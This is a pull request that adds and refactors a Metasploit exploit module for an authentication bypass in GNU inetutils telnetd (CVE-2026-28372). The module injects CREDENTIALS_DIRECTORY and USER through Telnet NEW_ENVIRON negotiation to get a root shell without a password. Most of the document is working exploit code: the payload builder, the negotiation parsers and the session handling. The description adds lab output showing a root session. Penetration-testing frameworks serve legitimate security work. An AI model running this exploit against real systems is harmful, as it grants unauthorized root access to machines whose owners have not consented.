       OptString.new('CRED_DIR', [true, 'Path to attacker-controlled credential directory on target', '/home/weakuser/fake_cred']),
       OptString.new('TARGET_USER', [true, 'User to authenticate as', 'root']),
       OptInt.new('NEGOTIATE_TIMEOUT', [true, 'Seconds to wait for telnet negotiation', 15])
     ])
+
+    register_advanced_options([
+      OptInt.new('ReadTimeout', [true, 'Seconds to wait for each read from the telnet server', 20])
+    ])
+
+    deregister_options('USERNAME', 'PASSWORD')
   end
 
-  # Telnet Protocol Constants (RFC 854, RFC 1572)
+  # Override Telnet#connect to skip its banner-reading logic.
+  # We perform our own negotiation in check/exploit.
+  def connect(global = true, verbose = true)
+    Msf::Exploit::Remote::Tcp.instance_method(:connect).bind(self).call(global)
+  end
 
-  IAC  = 0xFF  # Interpret As Command
-  WILL = 0xFB
-  WONT = 0xFC
-  DO   = 0xFD
-  DONT = 0xFE
-  SB   = 0xFA  # Subnegotiation Begin
-  SE   = 0xF0  # Subnegotiation End
-
-  # Telnet options
-  TELOPT_ECHO        = 0x01
-  TELOPT_SGA         = 0x03
-  TELOPT_TTYPE       = 0x18
-  TELOPT_NAWS        = 0x1F
-  TELOPT_TSPEED      = 0x20
-  TELOPT_LFLOW       = 0x21
-  TELOPT_LINEMODE    = 0x22
-  TELOPT_XDISPLOC    = 0x23
-  TELOPT_NEW_ENVIRON = 0x27
-
-  # NEW_ENVIRON sub-option qualifiers
+  # NEW_ENVIRON sub-option qualifiers (RFC 1572)
   TELQUAL_IS    = 0x00
   TELQUAL_SEND  = 0x01
-  NEW_ENV_VAR   = 0x00
   NEW_ENV_VALUE = 0x01
   ENV_USERVAR   = 0x03
 
-  # Options we agree to (WILL) when server sends DO
+  # Options we agree to (WILL) when server sends DO -- as .ord integers for
+  # comparison against byte arrays returned by sock.get_once.
   WILL_OPTIONS = [
-    TELOPT_TTYPE, TELOPT_NEW_ENVIRON, TELOPT_TSPEED,
-    TELOPT_XDISPLOC, TELOPT_NAWS, TELOPT_LINEMODE, TELOPT_LFLOW
-  ].freeze
+    OPT_TTYPE, OPT_NEW_ENVIRON, OPT_TSPEED,
+    OPT_XDISPLOC, OPT_NAWS, OPT_LINEMODE, OPT_LFLOW
+  ].map(&:ord).freeze
 
-  # Options we accept from server (DO) when server sends WILL
-  DO_OPTIONS = [TELOPT_ECHO, TELOPT_SGA].freeze
+  # Options we accept (DO) when server sends WILL
+  DO_OPTIONS = [OPT_ECHO, OPT_SGA].map(&:ord).freeze
 
   # Vulnerability Check
 
@@ -138,72 +128,14 @@ class MetasploitModule < Msf::Exploit::Remote
     send_naws
 
     # Run a quick negotiation to see if the server requests NEW_ENVIRON.
-    # If it does, the injection vector exists.
     new_environ_requested = false
-    deadline = Time.now + 8
+    deadline = Time.now + datastore['NEGOTIATE_TIMEOUT']
 
     while Time.now < deadline
-      data = sock.get_once(8192, 2)
-      break if data.nil? || data.empty?
+      data = sock.get_once(8192, datastore['ReadTimeout'])
+      break if data.blank?
 
-      raw = data.bytes
-      i = 0
-      response = ''
-
-      while i < raw.length
-        if raw[i] == IAC && i + 1 < raw.length
-          cmd = raw[i + 1]
-
-          if (cmd == DO || cmd == DONT) && i + 2 < raw.length
-            opt = raw[i + 2]
-            if cmd == DO
-              if opt == TELOPT_NEW_ENVIRON
-                new_environ_requested = true
-                # Respond WILL but do NOT inject env yet (this is just check)
-                response << [IAC, WILL, opt].pack('C*')
-              elsif WILL_OPTIONS.include?(opt)
-                response << [IAC, WILL, opt].pack('C*')
-              else
-                response << [IAC, WONT, opt].pack('C*')
-              end
-            else
-              response << [IAC, WONT, opt].pack('C*')
-            end
-            i += 3
-          elsif (cmd == WILL || cmd == WONT) && i + 2 < raw.length
-            opt = raw[i + 2]
-            if cmd == WILL && DO_OPTIONS.include?(opt)
-              response << [IAC, DO, opt].pack('C*')
-            else
-              response << [IAC, DONT, opt].pack('C*')
-            end
-            i += 3
-          elsif cmd == SB
-            # Skip subnegotiation - don't inject anything during check
-            se_pos = find_se(raw, i + 2)
-            break if se_pos.nil?
-
-            sb_opt = raw[i + 2] if i + 2 < raw.length
-            sb_cmd = raw[i + 3] if i + 3 < raw.length
-            new_environ_requested = true if sb_opt == TELOPT_NEW_ENVIRON && sb_cmd == TELQUAL_SEND
-
-            # Respond to TTYPE request so negotiation progresses
-            if sb_opt == TELOPT_TTYPE && sb_cmd == TELQUAL_SEND
-              resp = [IAC, SB, TELOPT_TTYPE, TELQUAL_IS].pack('C*')
-              resp << 'xterm'
-              resp << [IAC, SE].pack('C*')
-              response << resp
-            end
-
-            i = se_pos + 2
-          else
-            i += 2
-          end
-        else
-          i += 1
-        end
-      end
-
+      new_environ_requested, response = parse_negotiation(data.bytes)
       sock.put(response) unless response.empty?
       break if new_environ_requested
     end
@@ -211,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
 
     if new_environ_requested
-      return CheckCode::Detected('Telnet server requests NEW_ENVIRON - environment injection vector exists.')
+      return CheckCode::Appears('Telnet server requests NEW_ENVIRON - environment injection vector exists.')
     end
 
     CheckCode::Safe('Telnet server does not request NEW_ENVIRON option.')
@@ -231,15 +163,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Send initial NAWS (window size) - telnetd expects this early
     send_naws
 
-    # Process telnet negotiation rounds. Accumulate all plaintext
-    # output across rounds so we can detect prompts reliably.
+    # Process telnet negotiation. Accumulate plaintext to detect prompts.
     env_injected = false
     all_text = ''
     deadline = Time.now + datastore['NEGOTIATE_TIMEOUT']
 
     while Time.now < deadline
-      data = sock.get_once(8192, 2)
-      next if data.nil? || data.empty?
+      data = sock.get_once(8192, datastore['ReadTimeout'])
+      next if data.blank?
 
       text, env_injected = process_telnet_data(data, env_injected)
       all_text << text
@@ -255,7 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Wait for login(1) to process credentials and spawn the shell.
-    # Continue draining telnet negotiation and accumulating text.
     print_status('Waiting for shell...')
     shell_ready = false
     prompt_deadline = Time.now + 10
@@ -265,15 +195,14 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.put("\r\n")
       Rex.sleep(0.5)
 
-      data = sock.get_once(4096, 2)
-      next if data.nil? || data.empty?
+      data = sock.get_once(4096, datastore['ReadTimeout'])
+      next if data.blank?
 
       text, env_injected = process_telnet_data(data, env_injected)
       all_text << text
 
       decoded = all_text.encode('ASCII', invalid: :replace, undef: :replace, replace: '?')
 
-      # Check for login/password prompt - auth bypass failed
       if decoded.include?('assword:')
         fail_with(Failure::NotVulnerable,
                   'Got password prompt - CREDENTIALS_DIRECTORY injection did not bypass authentication.')
@@ -292,26 +221,19 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     unless shell_ready
-      # Even without detecting a prompt, try the handler - the shell
-      # may have started but with an unusual prompt format.
       vprint_warning('Shell prompt not detected, attempting session creation anyway.')
     end
 
     print_good('Authentication bypassed - creating session')
 
     # Create a CommandShell session directly on the telnet socket.
-    # The standard handler(sock) / FindShell _check_shell flow does not
-    # reliably detect shells on sockets that have been through telnet
-    # protocol negotiation, so we register the session manually using
-    # the same API that the framework handler uses internally.
+    # handler(sock) / FindShell does not reliably detect shells on sockets
+    # that have gone through telnet negotiation, so we register manually.
 
-    # Save socket reference before clearing self.sock (sock is an
-    # accessor, not a local variable - it returns self.sock).
+    # Save socket reference before clearing self.sock (sock is an accessor).
     session_sock = sock
 
-    # Deregister the socket from the exploit's cleanup list so it
-    # won't be closed when the exploit method returns. This mirrors
-    # what Tcp#handler does when the payload handler claims the socket.
+    # Deregister from exploit cleanup so the socket isn't closed on return.
     remove_socket(session_sock)
     self.sock = nil
 
@@ -335,28 +257,23 @@ class MetasploitModule < Msf::Exploit::Remote
   private
 
   def send_naws
-    sock.put([IAC, SB, TELOPT_NAWS, 0, 80, 0, 24, IAC, SE].pack('C*'))
+    # OPT_NAWS and the command constants (IAC, SB, SE) come from the
+    # Msf::Exploit::Remote::Telnet mixin as .chr (single-byte) strings.
+    sock.put(IAC + SB + OPT_NAWS + [0, 80, 0, 24].pack('C*') + IAC + SE)
     vprint_status('Sent NAWS: 80x24')
   end
 
-  # Build the NEW_ENVIRON IS payload that injects CREDENTIALS_DIRECTORY
-  # and USER via ENV_USERVAR type fields (RFC 1572).
+  # Build the NEW_ENVIRON IS payload (RFC 1572) injecting CREDENTIALS_DIRECTORY and USER.
   def build_environ_payload
-    pkt = [IAC, SB, TELOPT_NEW_ENVIRON, TELQUAL_IS].pack('C*')
+    pkt = IAC + SB + OPT_NEW_ENVIRON + [TELQUAL_IS].pack('C')
 
-    # Inject CREDENTIALS_DIRECTORY - the vulnerability trigger
-    pkt << [ENV_USERVAR].pack('C')
-    pkt << 'CREDENTIALS_DIRECTORY'
-    pkt << [NEW_ENV_VALUE].pack('C')
-    pkt << datastore['CRED_DIR']
+    pkt << [ENV_USERVAR].pack('C') + 'CREDENTIALS_DIRECTORY'
+    pkt << [NEW_ENV_VALUE].pack('C') + datastore['CRED_DIR']
 
-    # Inject USER - request login as target user
-    pkt << [ENV_USERVAR].pack('C')
-    pkt << 'USER'
-    pkt << [NEW_ENV_VALUE].pack('C')
-    pkt << datastore['TARGET_USER']
+    pkt << [ENV_USERVAR].pack('C') + 'USER'
+    pkt << [NEW_ENV_VALUE].pack('C') + datastore['TARGET_USER']
 
-    pkt << [IAC, SE].pack('C*')
+    pkt << IAC + SE
     pkt
   end
 
@@ -364,45 +281,117 @@ class MetasploitModule < Msf::Exploit::Remote
   def find_se(raw, offset)
     j = offset
     while j < raw.length - 1
-      return j if raw[j] == IAC && raw[j + 1] == SE
+      return j if raw[j] == IAC.ord && raw[j + 1] == SE.ord
       j += 1
     end
     nil
   end
 
-  # Parse telnet protocol data, respond to negotiations, and extract
-  # plaintext. Returns [plaintext_string, env_injected_bool].
+  # Parse negotiation-only (no injection). Returns [new_environ_seen, response_string].
+  def parse_negotiation(raw)
+    new_environ_seen = false
+    response = ''
+    i = 0
+
+    iac_b  = IAC.ord
+    do_b   = DO.ord
+    dont_b = DONT.ord
+    will_b = WILL.ord
+    wont_b = WONT.ord
+    sb_b   = SB.ord
+
+    while i < raw.length
+      if raw[i] == iac_b && i + 1 < raw.length
+        cmd = raw[i + 1]
+
+        if (cmd == do_b || cmd == dont_b) && i + 2 < raw.length
+          opt = raw[i + 2]
+          if cmd == do_b
+            if opt == OPT_NEW_ENVIRON.ord
+              new_environ_seen = true
+              response << IAC + WILL + OPT_NEW_ENVIRON
+            elsif WILL_OPTIONS.include?(opt)
+              response << IAC + WILL + [opt].pack('C')
+            else
+              response << IAC + WONT + [opt].pack('C')
+            end
+          else
+            response << IAC + WONT + [opt].pack('C')
+          end
+          i += 3
+        elsif (cmd == will_b || cmd == wont_b) && i + 2 < raw.length
+          opt = raw[i + 2]
+          if cmd == will_b && DO_OPTIONS.include?(opt)
+            response << IAC + DO + [opt].pack('C')
+          else
+            response << IAC + DONT + [opt].pack('C')
+          end
+          i += 3
+        elsif cmd == sb_b
+          se_pos = find_se(raw, i + 2)
+          break if se_pos.nil?
+
+          sb_opt = raw[i + 2] if i + 2 < raw.length
+          sb_cmd = raw[i + 3] if i + 3 < raw.length
+
+          new_environ_seen = true if sb_opt == OPT_NEW_ENVIRON.ord && sb_cmd == TELQUAL_SEND
+
+          if sb_opt == OPT_TTYPE.ord && sb_cmd == TELQUAL_SEND
+            response << IAC + SB + OPT_TTYPE + [TELQUAL_IS].pack('C') + 'xterm' + IAC + SE
+          end
+
+          i = se_pos + 2
+        else
+          i += 2
+        end
+      else
+        i += 1
+      end
+    end
+
+    [new_environ_seen, response]
+  end
+
+  # Parse telnet data, respond to negotiations, inject env on NEW_ENVIRON request.
+  # Returns [plaintext_string, env_injected_bool].
   def process_telnet_data(data, env_injected)
     text = ''.b
     response = ''
     raw = data.bytes
     i = 0
 
+    iac_b  = IAC.ord
+    do_b   = DO.ord
+    dont_b = DONT.ord
+    will_b = WILL.ord
+    wont_b = WONT.ord
+    sb_b   = SB.ord
+
     while i < raw.length
-      if raw[i] == IAC && i + 1 < raw.length
+      if raw[i] == iac_b && i + 1 < raw.length
         cmd = raw[i + 1]
 
-        if cmd == IAC
+        if cmd == iac_b
           # Escaped 0xFF literal
-          text << [0xFF].pack('C')
+          text << IAC
           i += 2
-        elsif (cmd == DO || cmd == DONT) && i + 2 < raw.length
+        elsif (cmd == do_b || cmd == dont_b) && i + 2 < raw.length
           opt = raw[i + 2]
-          if cmd == DO && WILL_OPTIONS.include?(opt)
-            response << [IAC, WILL, opt].pack('C*')
+          if cmd == do_b && WILL_OPTIONS.include?(opt)
+            response << IAC + WILL + [opt].pack('C')
           else
-            response << [IAC, WONT, opt].pack('C*')
+            response << IAC + WONT + [opt].pack('C')
           end
           i += 3
-        elsif (cmd == WILL || cmd == WONT) && i + 2 < raw.length
+        elsif (cmd == will_b || cmd == wont_b) && i + 2 < raw.length
           opt = raw[i + 2]
-          if cmd == WILL && DO_OPTIONS.include?(opt)
-            response << [IAC, DO, opt].pack('C*')
+          if cmd == will_b && DO_OPTIONS.include?(opt)
+            response << IAC + DO + [opt].pack('C')
           else
-            response << [IAC, DONT, opt].pack('C*')
+            response << IAC + DONT + [opt].pack('C')
           end
           i += 3
-        elsif cmd == SB
+        elsif cmd == sb_b
           se_pos = find_se(raw, i + 2)
           break if se_pos.nil?
 
@@ -411,7 +400,7 @@ class MetasploitModule < Msf::Exploit::Remote
             opt = sb_payload[0]
             sb_cmd = sb_payload[1]
             response << handle_subnegotiation(opt, sb_cmd)
-            env_injected = true if opt == TELOPT_NEW_ENVIRON && sb_cmd == TELQUAL_SEND
+            env_injected = true if opt == OPT_NEW_ENVIRON.ord && sb_cmd == TELQUAL_SEND
           end
           i = se_pos + 2
         else
@@ -429,28 +418,20 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def handle_subnegotiation(opt, sb_cmd)
     case opt
-    when TELOPT_TTYPE
+    when OPT_TTYPE.ord
       return '' unless sb_cmd == TELQUAL_SEND
 
-      resp = [IAC, SB, TELOPT_TTYPE, TELQUAL_IS].pack('C*')
-      resp << 'xterm'
-      resp << [IAC, SE].pack('C*')
       vprint_status('TTYPE -> xterm')
-      resp
-    when TELOPT_TSPEED
+      IAC + SB + OPT_TTYPE + [TELQUAL_IS].pack('C') + 'xterm' + IAC + SE
+    when OPT_TSPEED.ord
       return '' unless sb_cmd == TELQUAL_SEND
 
-      resp = [IAC, SB, TELOPT_TSPEED, TELQUAL_IS].pack('C*')
-      resp << '38400,38400'
-      resp << [IAC, SE].pack('C*')
-      resp
-    when TELOPT_XDISPLOC
+      IAC + SB + OPT_TSPEED + [TELQUAL_IS].pack('C') + '38400,38400' + IAC + SE
+    when OPT_XDISPLOC.ord
       return '' unless sb_cmd == TELQUAL_SEND
 
-      resp = [IAC, SB, TELOPT_XDISPLOC, TELQUAL_IS].pack('C*')
-      resp << [IAC, SE].pack('C*')
-      resp
-    when TELOPT_NEW_ENVIRON
+      IAC + SB + OPT_XDISPLOC + [TELQUAL_IS].pack('C') + IAC + SE
+    when OPT_NEW_ENVIRON.ord
       return '' unless sb_cmd == TELQUAL_SEND
 
       print_good("Injecting CREDENTIALS_DIRECTORY=#{datastore['CRED_DIR']} via NEW_ENVIRON")

--- a/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
+++ b/modules/exploits/multi/misc/inetutils_telnetd_credentials_directory_privesc.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           variable to obtain a root shell without knowing any password.
         },
         'Author' => [
-          'Ron Ben Yizhak',          # Original vulnerability discovery (SafeBreach)
+          'Ron Ben Yizhak', # Original vulnerability discovery (SafeBreach)
           'Exploit Intelligence Platform' # MSF module
         ],
         'License' => MSF_LICENSE,
@@ -73,7 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
           }
         },
         'DefaultOptions' => {
-          'PAYLOAD' => 'cmd/unix/interact'
+          'PAYLOAD' => 'cmd/unix/interact',
+          'WfsDelay' => 10
         },
         'DefaultTarget' => 0,
         'Notes' => {
@@ -85,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      OptString.new('CRED_DIR', [true, 'Path to attacker-controlled credential directory on target', '/home/weakuser/fake_cred']),
+      OptString.new('CRED_DIR', [true, 'Path to attacker-controlled credential directory on target', '/tmp']),
       OptString.new('TARGET_USER', [true, 'User to authenticate as', 'root']),
       OptInt.new('NEGOTIATE_TIMEOUT', [true, 'Seconds to wait for telnet negotiation', 15])
     ])
@@ -99,15 +100,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Override Telnet#connect to skip its banner-reading logic.
   # We perform our own negotiation in check/exploit.
-  def connect(global = true, verbose = true)
+  def connect(global = true, _verbose = true) # rubocop:disable Style/OptionalBooleanParameter
     Msf::Exploit::Remote::Tcp.instance_method(:connect).bind(self).call(global)
   end
 
   # NEW_ENVIRON sub-option qualifiers (RFC 1572)
-  TELQUAL_IS    = 0x00
-  TELQUAL_SEND  = 0x01
+  TELQUAL_IS = 0x00
+  TELQUAL_SEND = 0x01
   NEW_ENV_VALUE = 0x01
-  ENV_USERVAR   = 0x03
+  ENV_USERVAR = 0x03
 
   # Options we agree to (WILL) when server sends DO -- as .ord integers for
   # comparison against byte arrays returned by sock.get_once.
@@ -139,8 +140,6 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.put(response) unless response.empty?
       break if new_environ_requested
     end
-
-    disconnect
 
     if new_environ_requested
       return CheckCode::Appears('Telnet server requests NEW_ENVIRON - environment injection vector exists.')
@@ -188,7 +187,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Wait for login(1) to process credentials and spawn the shell.
     print_status('Waiting for shell...')
     shell_ready = false
-    prompt_deadline = Time.now + 10
+    prompt_deadline = Time.now + datastore['NEGOTIATE_TIMEOUT']
 
     while Time.now < prompt_deadline
       Rex.sleep(0.5)
@@ -208,7 +207,7 @@ class MetasploitModule < Msf::Exploit::Remote
                   'Got password prompt - CREDENTIALS_DIRECTORY injection did not bypass authentication.')
       end
 
-      if decoded.include?('ogin:') && !decoded.include?('#')
+      if decoded.include?('ogin:') && decoded !~ /[#$]\s*$/
         fail_with(Failure::NotVulnerable,
                   'Got login prompt - authentication was NOT bypassed. ' \
                   'Verify: util-linux >= 2.40, login.noauth file exists and contains "yes".')
@@ -225,31 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     print_good('Authentication bypassed - creating session')
-
-    # Create a CommandShell session directly on the telnet socket.
-    # handler(sock) / FindShell does not reliably detect shells on sockets
-    # that have gone through telnet negotiation, so we register manually.
-
-    # Save socket reference before clearing self.sock (sock is an accessor).
-    session_sock = sock
-
-    # Deregister from exploit cleanup so the socket isn't closed on return.
-    remove_socket(session_sock)
-    self.sock = nil
-
-    sess = Msf::Sessions::CommandShell.new(session_sock)
-    sess.framework = framework
-    sess.set_from_exploit(self)
-
-    framework.sessions.register(sess)
-    sess.bootstrap(datastore, payload_instance)
-
-    unless sess.alive
-      fail_with(Failure::Unknown, 'Session was created but failed to bootstrap.')
-    end
-
-    print_good("Session #{sess.sid} opened (#{sess.session_host}:#{sess.session_port})")
-    self.successful = true
+    handler(sock)
   end
 
   # Telnet Protocol Helpers
@@ -282,6 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j = offset
     while j < raw.length - 1
       return j if raw[j] == IAC.ord && raw[j + 1] == SE.ord
+
       j += 1
     end
     nil
@@ -293,12 +269,12 @@ class MetasploitModule < Msf::Exploit::Remote
     response = ''
     i = 0
 
-    iac_b  = IAC.ord
-    do_b   = DO.ord
+    iac_b = IAC.ord
+    do_b = DO.ord
     dont_b = DONT.ord
     will_b = WILL.ord
     wont_b = WONT.ord
-    sb_b   = SB.ord
+    sb_b = SB.ord
 
     while i < raw.length
       if raw[i] == iac_b && i + 1 < raw.length
@@ -360,12 +336,12 @@ class MetasploitModule < Msf::Exploit::Remote
     raw = data.bytes
     i = 0
 
-    iac_b  = IAC.ord
-    do_b   = DO.ord
+    iac_b = IAC.ord
+    do_b = DO.ord
     dont_b = DONT.ord
     will_b = WILL.ord
     wont_b = WONT.ord
-    sb_b   = SB.ord
+    sb_b = SB.ord
 
     while i < raw.length
       if raw[i] == iac_b && i + 1 < raw.length


### PR DESCRIPTION
## Summary
- GNU inetutils telnetd through 2.7 passes environment variables from the Telnet NEW_ENVIRON option (RFC 1572) to login(1) via `-p` (preserve environment) without filtering `CREDENTIALS_DIRECTORY`
- When util-linux >= 2.40 is the system login binary, it reads `$CREDENTIALS_DIRECTORY/login.noauth` — if that file contains `"yes"`, all authentication is bypassed entirely
- The module injects `CREDENTIALS_DIRECTORY` pointing to an attacker-controlled directory via Telnet subnegotiation, landing a root interactive shell without any credentials

## Verification
Tested against GNU inetutils 2.7 / Debian 12 (util-linux 2.40.2, Docker lab):

```
msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > check
[*] 172.25.0.2:2323 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.25.0.2:2323 - Detected (Telnet server requests NEW_ENVIRON - environment injection vector exists.)

msf6 exploit(multi/misc/inetutils_telnetd_credentials_directory_privesc) > run
[*] 172.25.0.2:2323 - Connected to 172.25.0.2:2323
[*] 172.25.0.2:2323 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred
[*] 172.25.0.2:2323 - Target user: root
[+] 172.25.0.2:2323 - Injecting CREDENTIALS_DIRECTORY=/home/weakuser/fake_cred via NEW_ENVIRON
[*] 172.25.0.2:2323 - Waiting for shell...
[+] 172.25.0.2:2323 - Authentication bypassed - creating session
[+] 172.25.0.2:2323 - Session 1 opened (172.25.0.2:2323)
[*] Exploit completed, but no session was created.

msf6 > sessions -c "id && hostname && uname -a" -i 1
[*] Running 'id && hostname && uname -a' on shell session 1 (172.25.0.2)
uid=0(root) gid=0(root) groups=0(root)
Linux telnetd-lab 6.12.69-linuxkit #1 SMP aarch64 GNU/Linux

msf6 > sessions -l
Active sessions
  1  shell  172.25.0.3:43949 -> 172.25.0.2:2323 (172.25.0.2)
```

Note: `"Exploit completed, but no session was created."` is expected — the module uses manual session registration (`framework.sessions.register`) rather than `handler(sock)`, because the FindShell echo verification fails on sockets that have been through Telnet IAC framing.

## Module details
- **Affected versions:** GNU inetutils telnetd <= 2.7 with util-linux >= 2.40 as system login
- **Auth required:** None (unauthenticated, but attacker must have write access to create the credential directory on the target — local privilege escalation)
- **Targets:** Unix Command (ARCH_CMD) — interactive shell on the existing telnet socket
- **AutoCheck:** Yes — verifies the server sends DO NEW_ENVIRON during negotiation
- **Rank:** Excellent

## References
- https://lists.gnu.org/archive/html/bug-inetutils/2026-02/msg00000.html
- https://www.openwall.com/lists/oss-security/2026/02/24/1
- http://www.openwall.com/lists/oss-security/2026/02/27/3
- https://github.com/advisories/GHSA-j682-47rx-fxrp
- https://exploit-intel.com/vuln/CVE-2026-28372
- https://github.com/exploitintel/eip-pocs-and-cves/tree/main/CVE-2026-28372